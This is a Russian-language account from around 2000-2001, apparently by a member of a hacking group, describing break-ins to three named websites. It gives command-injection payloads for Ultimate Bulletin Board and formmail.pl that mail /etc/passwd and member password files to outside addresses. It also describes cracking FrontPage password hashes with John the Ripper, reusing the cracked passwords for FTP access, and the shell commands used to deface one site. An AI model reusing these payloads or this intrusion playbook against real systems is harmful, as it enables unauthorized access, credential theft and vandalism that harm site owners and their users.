|
|
 |
|
 | 
Описания взломов серверов на конкретных
примерах. |
Написано одним из участников бывшей "GiN
Group" (материал 2000-2001 года). (newbies stuff
;)) ====================
Описания взломов серверов
на конкретных
примерах.
www.kungfuklan.com www.w-three.net sinobord.hypermart.net www.kungfuklan.com
Все
началось с того, что сидели мы в IRC - я, Ozzman и D@rk Sun.
Время было позднее и я решил идти спать, но вдруг D@rk
говорит, типа, гляньте сюда http://www.kungfuklan.com. Я решил
посмотреть и попал на страницу какой-то то ли Корейской, то ли
Китайской крэкерской группы. Ну так полазил, огляделся, зашел
на форум, посмотрел релизы, в общем мне понравилось и дизайн
классный :). Вдруг мне как 2-ое чуство говорит проверить папку
CGI-BIN на доступность. Ну ввожу я
http://www.kungfuklan.com/cgi-bin/, и что вы думаете ?:)
Правильно! На этой папке был открыт доступ и можно посмотреть
все скрипты :). Как раз за пару дней до этого на сайте группы
DAMNED я прочитал о свеже найденной дырке в Ultimate Bulletin
Board, данная доска и стояла у наших самураев :). Ozzman так
же приметил это и не долго думая сохранил Sourse формы где был
Replay и дописал в поле topic следующие:
topic='012345.ubb|mail ozzman@hacked.com
</etc/passwd|'
Но к сожалению пароли были в Shadow
:(. Мы не стали огорчаться и поменяв строку на
следующую: topic='012345.ubb|cat Members/*|mail
ozzman@hacked.com|'
получили пароли в открытом виде на
всю доску! Но доски то мало :). Начали исследовать
дальше и сразу наткнулись на дирукторию _private и файл
.htpasswd . Если кто не знает - здесь обычно лежат хеши
паролей FrontPage. Так же и в директории _private лежит файл
services.pwd и тоже с паролями:). Поставив john'а перебирать
пароли мы отправились дальше по директориям. Не найдя в
общем-то ничего полезного пошли спать. После 3-х дней, D@rk
наконец-то расшифровал пароли но они были от FrontPage :(,
один из паролей был kickMe :), мы решили попробовать его по
FTP и ура, ура, ура, пароль подошел и сервер в наших руках!
Вот к чему приводит халатность… Админ (видать поленился
придумать другой пароль для FTP, или забыть его побоялся :)).
Просьба ко всем, если пароль еще не поменяли или не заделали
дырку, не наносите никакого вреда данному серверу.
<br><Br> Вот так был взломан сайт клана Kungfu :).
Спасибо группе DAMNED, за так сказать вовремя выложенную
информацию.
www.w-three.net В способе взлома этого
сайта нет ничего нового и оригинального. Это скорее пример для
ленивых администраторов и начинающих script kiddie, чем
полезная информация для мало- мальски знающего хакера. В общем
дырка заключалась в присутствии на сайте скрипта formmail.pl
by Matt Wright версии 1.0 содержащего уязвимость позволяющую
выполнять команды shell. Об этой уязвимости можно прочитать в
cgi-bug на qwerty.nanko.ru, но я сам попробую описать принцип
действия: для отправки почты скрипт использует следующую
строку:
open (MAIL, "|$mailprog
$FORM{'recipient'}") где $FORM{'recipient'} поле recipient
из вызывающего html и $mailprog='/bin/sendmail'. знак "|"
означает выполнение команды shell. т.е. заменив на
выполнится команду: "/bin/sendmail; cat /etc/passwd | mail
hacker@mail.com"
которая отправит файл с паролями
на hacker@mail.com Вот в принципе и все что нужно знать для
использования данной уязвимости. Теперь вернемся к взлому
www.w-three.net. Мне повезло. Получив passwd я увидел там
hash'ы паролей, а не "*" как при использовании shadow. Так как
для данного сайта меня интересовал только deface и мне нужен
был доступ для закачки файлов, то я выбрал всех пользователей
у которых был доступ на ftp и скормил их john'у. Он сразу
нашел пароль для пользователя gast - помогла буржуйская
привычка ставить login=passwd. Во взломе помогло мне и то
обстоятельство, что скрипт принадлежал и выполнялся с правами
пользователя имеющего самый высокий доступ в системе(если не
брать в расчет root'а). Я мог читать, изменять и создавать
любые файлы которые принадлежали этому пользователю, а это
были почти все файлы. Ну что ж, я имею все возможности для
deface: доступ для закачки своего html и права на перезапись
index.html лежащего на сайте. чем я и
воспользовался:
mv /usr/local/etc/httpd/htdocs/index.thml
\ /usr/local/etc/httpd/htdocs/index1.html
cp /usr/local/etc/httpd/htdocs/gast/my.html
/usr/local/etc/httpd/htdocs/index.html \
Вот так
"плохие" пароли, не правильное распределение прав и не
обновленные скрипты могут способствовать захвату
сайта.
sinobord.hypermart.net Всё началось с того,
что Lynx рассказал(а) мне о commander.pl (даёт возможность
исполнения команд как на shell кому интересно сходите и
почитайте на www.hack-crack.com )и я стал искать сайты с этим
скриптом и нашёл. Этим сайтом был sinoboard.hypermart.net
(хост www.hypermart.net), как не странно там выводился листинг
директорий. На некоторые каталоги стоял пароль (я бы сказал на
все в которых могло быть что либо интересное).
Использование commander'a дало не много файл паролей,
который лежал в /etc был, как я понял от www.hypermart.net, но
там меня ждало разочарование все пароли в * хе-хе… (обидно
понимаешь), а master.passwd не был доступен. Но я не стал
разочаровываться и начал исследовать все каталоги,на которые
был доступ без пароля. Много чего там было и чат, и доска
объявлений, и всякая другая всячина. Так- же там был и
скрипт fileman.cgi по сути это файловый менеджер. На запуск
этого скрипта пароль не стоял. Я стал смотреть содержимое
каталогов через него, и какая же радость он не требовал пароля
при открытии каталогов на которые стоял пароль. Пройдясь по
каталогам ещё раз я нашёл то что мне было нужно, файлик
service.pwd в _vti_pvt. Кстати этот менеджер давал возможность
редактировать файлы так что я мог сразу записать новую запись
в этот файл (наверное), но для начала я поставил файл на
рассшифровку (там была всего одна учётная запись), и буквально
через две минуты у меня на руках был пароль, он состоял из 4
цифр Для проверки зашёл по ftp всё
работало.
| | |